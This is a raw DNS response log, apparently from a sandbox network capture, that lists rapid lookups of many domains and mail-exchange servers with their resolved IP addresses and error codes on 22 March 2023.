Mar 22, 2023 05:44:27.579855919 CET	8.8.8.8	192.168.2.5	0xb201	No error (0)	themark.org		100.24.208.97	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.636136055 CET	8.8.8.8	192.168.2.5	0x8f5c	No error (0)	semuk.com		52.128.23.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.686017036 CET	8.8.8.8	192.168.2.5	0x1460	No error (0)	nts-web.net		49.212.235.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.694612980 CET	8.8.8.8	192.168.2.5	0xe16d	No error (0)	semuk.com		52.128.23.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.698311090 CET	8.8.8.8	192.168.2.5	0x77bd	No error (0)	apcotex.com		35.154.163.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.710318089 CET	8.8.8.8	192.168.2.5	0xb8e4	No error (0)	rkengg.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:27.710318089 CET	8.8.8.8	192.168.2.5	0xb8e4	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:27.710318089 CET	8.8.8.8	192.168.2.5	0xb8e4	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.710318089 CET	8.8.8.8	192.168.2.5	0xb8e4	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.746376038 CET	8.8.8.8	192.168.2.5	0xa194	No error (0)	metaforacom.com		185.42.105.162	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.774230003 CET	8.8.8.8	192.168.2.5	0x7800	No error (0)	onzcda.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.774230003 CET	8.8.8.8	192.168.2.5	0x7800	No error (0)	onzcda.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.813103914 CET	8.8.8.8	192.168.2.5	0x965d	No error (0)	mxs.mail.ru		217.69.139.150	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.813103914 CET	8.8.8.8	192.168.2.5	0x965d	No error (0)	mxs.mail.ru		94.100.180.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.857681990 CET	8.8.8.8	192.168.2.5	0xabb3	No error (0)	roewer.de		45.142.176.225	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.874273062 CET	8.8.8.8	192.168.2.5	0x42af	No error (0)	alt4.gmail-smtp-in.l.google.com		173.194.202.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.915236950 CET	8.8.8.8	192.168.2.5	0xbd17	No error (0)	gmail-smtp-in.l.google.com		142.251.31.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.915472031 CET	8.8.8.8	192.168.2.5	0x55c	No error (0)	mackusick.de		217.160.0.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.931718111 CET	8.8.8.8	192.168.2.5	0x7713	No error (0)	tcpoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.931718111 CET	8.8.8.8	192.168.2.5	0x7713	No error (0)	tcpoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.936253071 CET	8.8.8.8	192.168.2.5	0x125e	No error (0)	wanoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.936253071 CET	8.8.8.8	192.168.2.5	0x125e	No error (0)	wanoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.942285061 CET	8.8.8.8	192.168.2.5	0x41c5	No error (0)	nolaoig.org		54.212.145.129	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.974767923 CET	8.8.8.8	192.168.2.5	0xde0f	No error (0)	peminet.net		198.54.117.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.012039900 CET	8.8.8.8	192.168.2.5	0xb9df	No error (0)	nblewis.com		35.169.15.168	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.012039900 CET	8.8.8.8	192.168.2.5	0xb9df	No error (0)	nblewis.com		35.168.185.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.012039900 CET	8.8.8.8	192.168.2.5	0xb9df	No error (0)	nblewis.com		52.0.29.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.052916050 CET	8.8.8.8	192.168.2.5	0x54f5	No error (0)	in1.smtp.messagingengine.com		66.111.4.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.052916050 CET	8.8.8.8	192.168.2.5	0x54f5	No error (0)	in1.smtp.messagingengine.com		66.111.4.73	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.052916050 CET	8.8.8.8	192.168.2.5	0x54f5	No error (0)	in1.smtp.messagingengine.com		66.111.4.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.052916050 CET	8.8.8.8	192.168.2.5	0x54f5	No error (0)	in1.smtp.messagingengine.com		66.111.4.74	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.052916050 CET	8.8.8.8	192.168.2.5	0x54f5	No error (0)	in1.smtp.messagingengine.com		66.111.4.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.052916050 CET	8.8.8.8	192.168.2.5	0x54f5	No error (0)	in1.smtp.messagingengine.com		66.111.4.71	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.061981916 CET	8.8.8.8	192.168.2.5	0x2333	No error (0)	tozzhin.com		202.94.166.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.103744030 CET	8.8.8.8	192.168.2.5	0xfd95	Name error (3)	www.medisa.info	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.113020897 CET	8.8.8.8	192.168.2.5	0x7fca	No error (0)	wahw.com.au		54.194.190.151	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.117950916 CET	8.8.8.8	192.168.2.5	0xb476	No error (0)	bossinst.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.132788897 CET	8.8.8.8	192.168.2.5	0xbc27	No error (0)	eos-i.com	macx1980.qy56.supcname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:28.132788897 CET	8.8.8.8	192.168.2.5	0xbc27	No error (0)	macx1980.qy56.supcname.com	mfddos.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:28.132788897 CET	8.8.8.8	192.168.2.5	0xbc27	No error (0)	mfddos.datacname.com	15.204.18.132.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:28.132788897 CET	8.8.8.8	192.168.2.5	0xbc27	No error (0)	15.204.18.132.datacname.com		15.204.18.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.177141905 CET	8.8.8.8	192.168.2.5	0x61d9	No error (0)	eos-i.com	macx1980.qy56.supcname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:28.177141905 CET	8.8.8.8	192.168.2.5	0x61d9	No error (0)	macx1980.qy56.supcname.com	mfddos.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:28.177141905 CET	8.8.8.8	192.168.2.5	0x61d9	No error (0)	mfddos.datacname.com	15.204.18.132.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:28.177141905 CET	8.8.8.8	192.168.2.5	0x61d9	No error (0)	15.204.18.132.datacname.com		15.204.18.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.182523012 CET	8.8.8.8	192.168.2.5	0xe195	No error (0)	atbauk.org		104.21.92.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.182523012 CET	8.8.8.8	192.168.2.5	0xe195	No error (0)	atbauk.org		172.67.196.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.195628881 CET	8.8.8.8	192.168.2.5	0x486c	No error (0)	x96.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.195628881 CET	8.8.8.8	192.168.2.5	0x486c	No error (0)	x96.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.223493099 CET	8.8.8.8	192.168.2.5	0xcd7d	No error (0)	reproar.com		194.143.194.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.232903004 CET	8.8.8.8	192.168.2.5	0x83b3	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.246464014 CET	8.8.8.8	192.168.2.5	0x68bf	No error (0)	rast.se		89.221.250.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.290509939 CET	8.8.8.8	192.168.2.5	0xaa30	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.312951088 CET	8.8.8.8	192.168.2.5	0x9e4	No error (0)	nettle.pl		195.128.140.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.320327997 CET	8.8.8.8	192.168.2.5	0x31e9	No error (0)	hyab.se		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.320327997 CET	8.8.8.8	192.168.2.5	0x31e9	No error (0)	hyab.se		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.346764088 CET	8.8.8.8	192.168.2.5	0xf0de	No error (0)	kallman.net		185.76.64.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.401587009 CET	8.8.8.8	192.168.2.5	0x2a37	Name error (3)	mail7.digitalwaves.co.nz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.413645983 CET	8.8.8.8	192.168.2.5	0x7eb	No error (0)	sidepath.com		75.2.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.413645983 CET	8.8.8.8	192.168.2.5	0x7eb	No error (0)	sidepath.com		34.193.69.252	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.413645983 CET	8.8.8.8	192.168.2.5	0x7eb	No error (0)	sidepath.com		34.193.204.92	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.413645983 CET	8.8.8.8	192.168.2.5	0x7eb	No error (0)	sidepath.com		99.83.190.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.424484015 CET	8.8.8.8	192.168.2.5	0x8ca1	No error (0)	sgk.home.pl		89.161.136.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.429322004 CET	8.8.8.8	192.168.2.5	0x6076	No error (0)	dyag-eng.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.450376034 CET	8.8.8.8	192.168.2.5	0xe48f	No error (0)	mackusick.com		217.160.0.179	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.505062103 CET	8.8.8.8	192.168.2.5	0x9f3b	No error (0)	iranytu.net		103.224.212.222	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.518935919 CET	8.8.8.8	192.168.2.5	0x6aa1	No error (0)	nlcv.bas.bg		195.96.252.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.606988907 CET	8.8.8.8	192.168.2.5	0xc96a	No error (0)	skypearl.com		153.122.170.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.645678043 CET	8.8.8.8	192.168.2.5	0xbf1b	No error (0)	clinicasanluis.com.co		104.21.66.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.645678043 CET	8.8.8.8	192.168.2.5	0xbf1b	No error (0)	clinicasanluis.com.co		172.67.164.178	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.670452118 CET	8.8.8.8	192.168.2.5	0x41c0	No error (0)	beafin.com		133.125.38.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.683799982 CET	8.8.8.8	192.168.2.5	0xc9de	No error (0)	zugseil.com		92.42.191.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.711258888 CET	8.8.8.8	192.168.2.5	0x4e7d	No error (0)	www.11tochi.net		157.112.176.4	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.773371935 CET	8.8.8.8	192.168.2.5	0xefd0	No error (0)	adventist.ro		49.12.155.123	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.013325930 CET	8.8.8.8	192.168.2.5	0xf40	No error (0)	cpmteam.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.013325930 CET	8.8.8.8	192.168.2.5	0xf40	No error (0)	cpmteam.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.025522947 CET	8.8.8.8	192.168.2.5	0x9b28	No error (0)	agulatex.com		133.125.38.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.070112944 CET	8.8.8.8	192.168.2.5	0xf91	No error (0)	ascc.org.au		203.210.102.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.167742014 CET	8.8.8.8	192.168.2.5	0x9bdf	No error (0)	sjbmw.com		198.199.101.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.178406000 CET	8.8.8.8	192.168.2.5	0x553a	No error (0)	pleszew.policja.gov.pl		91.229.22.126	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.290998936 CET	8.8.8.8	192.168.2.5	0x6938	No error (0)	nblewis.com		35.168.185.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.290998936 CET	8.8.8.8	192.168.2.5	0x6938	No error (0)	nblewis.com		35.169.15.168	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.290998936 CET	8.8.8.8	192.168.2.5	0x6938	No error (0)	nblewis.com		52.0.29.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.421323061 CET	8.8.8.8	192.168.2.5	0xe9e4	No error (0)	ramkome.com		62.75.216.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.460277081 CET	8.8.8.8	192.168.2.5	0x2699	No error (0)	www.usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.462274075 CET	8.8.8.8	192.168.2.5	0x262	No error (0)	wvs-net.de		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.462274075 CET	8.8.8.8	192.168.2.5	0x262	No error (0)	wvs-net.de		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.516098976 CET	8.8.8.8	192.168.2.5	0x35f3	No error (0)	nekono.net		202.172.28.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.521352053 CET	8.8.8.8	192.168.2.5	0xad42	No error (0)	web-york.com		219.94.129.97	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.558343887 CET	8.8.8.8	192.168.2.5	0xe03b	No error (0)	flamingorecordings.com		35.214.171.193	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.561352015 CET	8.8.8.8	192.168.2.5	0x9d4d	No error (0)	www.ex-olive.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.628223896 CET	8.8.8.8	192.168.2.5	0xd611	No error (0)	epc.com.au		103.4.16.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.639838934 CET	8.8.8.8	192.168.2.5	0x10a8	No error (0)	www.pb-games.com	pb-games.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:29.639838934 CET	8.8.8.8	192.168.2.5	0x10a8	No error (0)	pb-games.com		173.254.28.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.662786961 CET	8.8.8.8	192.168.2.5	0xa929	No error (0)	indonesiamedia.com		74.208.215.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.736915112 CET	8.8.8.8	192.168.2.5	0xed42	No error (0)	revoldia.net		45.200.235.135	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.796761990 CET	8.8.8.8	192.168.2.5	0x4143	No error (0)	likangds.com		23.225.40.19	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.845670938 CET	8.8.8.8	192.168.2.5	0xc59a	No error (0)	kumaden.com		49.212.180.178	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.849539042 CET	8.8.8.8	192.168.2.5	0x80b3	No error (0)	nettlinx.org		202.53.77.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.935694933 CET	8.8.8.8	192.168.2.5	0x40d2	No error (0)	techtrans.de		185.237.66.112	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.066750050 CET	8.8.8.8	192.168.2.5	0xd4a2	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.097884893 CET	8.8.8.8	192.168.2.5	0x9675	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.121563911 CET	8.8.8.8	192.168.2.5	0x2f58	No error (0)	impexnc.com		204.11.56.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.136809111 CET	8.8.8.8	192.168.2.5	0x5d57	Server failure (2)	canmore.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.163256884 CET	8.8.8.8	192.168.2.5	0x5cc	Name error (3)	www.koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.255119085 CET	8.8.8.8	192.168.2.5	0xa253	No error (0)	magicomm.co.uk		83.223.113.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.289875031 CET	8.8.8.8	192.168.2.5	0x84b8	No error (0)	cpmteam.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.289875031 CET	8.8.8.8	192.168.2.5	0x84b8	No error (0)	cpmteam.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.351178885 CET	8.8.8.8	192.168.2.5	0xa192	No error (0)	coxkitchensandbaths.com		205.149.134.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.484654903 CET	8.8.8.8	192.168.2.5	0x21ca	No error (0)	rokoron.com		211.13.204.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.623317003 CET	8.8.8.8	192.168.2.5	0x8cd1	No error (0)	fundeo.com		104.24.160.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.623317003 CET	8.8.8.8	192.168.2.5	0x8cd1	No error (0)	fundeo.com		172.67.97.62	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.623317003 CET	8.8.8.8	192.168.2.5	0x8cd1	No error (0)	fundeo.com		104.24.161.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.638552904 CET	8.8.8.8	192.168.2.5	0x52a5	No error (0)	dayvo.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.638552904 CET	8.8.8.8	192.168.2.5	0x52a5	No error (0)	dayvo.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.666898966 CET	8.8.8.8	192.168.2.5	0xf4c	No error (0)	nettle.pl		195.128.140.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.673748016 CET	8.8.8.8	192.168.2.5	0xd648	No error (0)	snf.it		95.174.22.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.781253099 CET	8.8.8.8	192.168.2.5	0x2ed1	No error (0)	xult.org		65.52.128.33	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.797691107 CET	8.8.8.8	192.168.2.5	0xe865	No error (0)	com-edit.fr		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.843298912 CET	8.8.8.8	192.168.2.5	0x4a9	No error (0)	www.sclover3.com		157.112.182.239	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.899976015 CET	8.8.8.8	192.168.2.5	0x1e90	No error (0)	portoccd.org		51.89.6.56	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.098015070 CET	8.8.8.8	192.168.2.5	0x5148	No error (0)	zupraha.cz		77.78.104.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.181318998 CET	8.8.8.8	192.168.2.5	0x7f43	No error (0)	pers.com		192.124.249.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.241065025 CET	8.8.8.8	192.168.2.5	0xa90c	No error (0)	cnti.krsn.ru		217.74.161.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.420407057 CET	8.8.8.8	192.168.2.5	0x8ce0	Name error (3)	amba-tc.si	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.479664087 CET	8.8.8.8	192.168.2.5	0xb348	No error (0)	vdoherty.com		91.216.241.100	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.501240015 CET	8.8.8.8	192.168.2.5	0xd35d	Name error (3)	amba-tc.si	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.555433035 CET	8.8.8.8	192.168.2.5	0x7e60	No error (0)	skgm.ru		91.201.52.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.573681116 CET	8.8.8.8	192.168.2.5	0xe10a	Name error (3)	amba-tc.si	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.582078934 CET	8.8.8.8	192.168.2.5	0x8583	No error (0)	a-domani.com		183.90.232.24	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.599215031 CET	8.8.8.8	192.168.2.5	0x1280	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.662765980 CET	8.8.8.8	192.168.2.5	0xe0c4	No error (0)	karmy.com.pl		185.253.212.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.690045118 CET	8.8.8.8	192.168.2.5	0xfebe	No error (0)	any-s.net		108.170.12.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.719274044 CET	8.8.8.8	192.168.2.5	0x5721	No error (0)	wantapc.net		157.7.107.49	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.756268024 CET	8.8.8.8	192.168.2.5	0xea50	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.843274117 CET	8.8.8.8	192.168.2.5	0xda7f	No error (0)	riwn.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.843274117 CET	8.8.8.8	192.168.2.5	0xda7f	No error (0)	riwn.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.843274117 CET	8.8.8.8	192.168.2.5	0xda7f	No error (0)	riwn.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.843274117 CET	8.8.8.8	192.168.2.5	0xda7f	No error (0)	riwn.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.902112961 CET	8.8.8.8	192.168.2.5	0xea50	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.909065008 CET	8.8.8.8	192.168.2.5	0xce1	No error (0)	revoldia.net		45.200.235.135	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.073750019 CET	8.8.8.8	192.168.2.5	0xc731	No error (0)	gmail-smtp-in.l.google.com		142.251.31.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.461164951 CET	8.8.8.8	192.168.2.5	0xbc20	No error (0)	reproar.com		194.143.194.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.537050009 CET	8.8.8.8	192.168.2.5	0x8843	No error (0)	btsi.com.ph		69.46.30.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.553020000 CET	8.8.8.8	192.168.2.5	0x7170	No error (0)	nekono.net		202.172.28.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.621401072 CET	8.8.8.8	192.168.2.5	0x97bd	No error (0)	scintel.com		23.239.201.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.642858982 CET	8.8.8.8	192.168.2.5	0x1280	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.662056923 CET	8.8.8.8	192.168.2.5	0xea50	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.814896107 CET	8.8.8.8	192.168.2.5	0x5c46	No error (0)	hyab.com		104.21.65.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.814896107 CET	8.8.8.8	192.168.2.5	0x5c46	No error (0)	hyab.com		172.67.193.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.925211906 CET	8.8.8.8	192.168.2.5	0xcc62	No error (0)	peminet.net		198.54.117.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:33.464111090 CET	8.8.8.8	192.168.2.5	0xb289	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:33.642344952 CET	8.8.8.8	192.168.2.5	0xf345	No error (0)	cbras.com		54.39.198.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:33.676193953 CET	8.8.8.8	192.168.2.5	0x1280	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:34.731363058 CET	8.8.8.8	192.168.2.5	0x6f24	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.211847067 CET	8.8.8.8	192.168.2.5	0x806a	No error (0)	paraski.org		94.130.164.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.274087906 CET	8.8.8.8	192.168.2.5	0x6680	No error (0)	holp-ai.com		59.106.13.169	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.378025055 CET	8.8.8.8	192.168.2.5	0xe769	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.420788050 CET	8.8.8.8	192.168.2.5	0xc137	No error (0)	gbmfg.com		151.101.2.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.420788050 CET	8.8.8.8	192.168.2.5	0xc137	No error (0)	gbmfg.com		151.101.66.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.420788050 CET	8.8.8.8	192.168.2.5	0xc137	No error (0)	gbmfg.com		151.101.130.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.420788050 CET	8.8.8.8	192.168.2.5	0xc137	No error (0)	gbmfg.com		151.101.194.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.432151079 CET	8.8.8.8	192.168.2.5	0x3617	No error (0)	wnit.org		38.111.255.201	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.478143930 CET	8.8.8.8	192.168.2.5	0x8df4	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.501346111 CET	8.8.8.8	192.168.2.5	0x6b9f	No error (0)	acraloc.com		192.64.150.164	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.593616962 CET	8.8.8.8	192.168.2.5	0x5c46	No error (0)	hyab.com		104.21.65.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.593616962 CET	8.8.8.8	192.168.2.5	0x5c46	No error (0)	hyab.com		172.67.193.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.669668913 CET	8.8.8.8	192.168.2.5	0x5347	No error (0)	dog-jog.net		153.122.24.177	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.697108030 CET	8.8.8.8	192.168.2.5	0x3ccb	No error (0)	rokoron.com		211.13.204.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.723352909 CET	8.8.8.8	192.168.2.5	0x1280	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.723968029 CET	8.8.8.8	192.168.2.5	0x7467	No error (0)	cqdgroup.com		221.132.33.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.966620922 CET	8.8.8.8	192.168.2.5	0x6f24	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.177242994 CET	8.8.8.8	192.168.2.5	0xbdec	No error (0)	snf.it		95.174.22.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.273607016 CET	8.8.8.8	192.168.2.5	0x4875	No error (0)	sidepath.com		75.2.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.273607016 CET	8.8.8.8	192.168.2.5	0x4875	No error (0)	sidepath.com		99.83.190.102	A (IP address)	IN (0x0001)	false
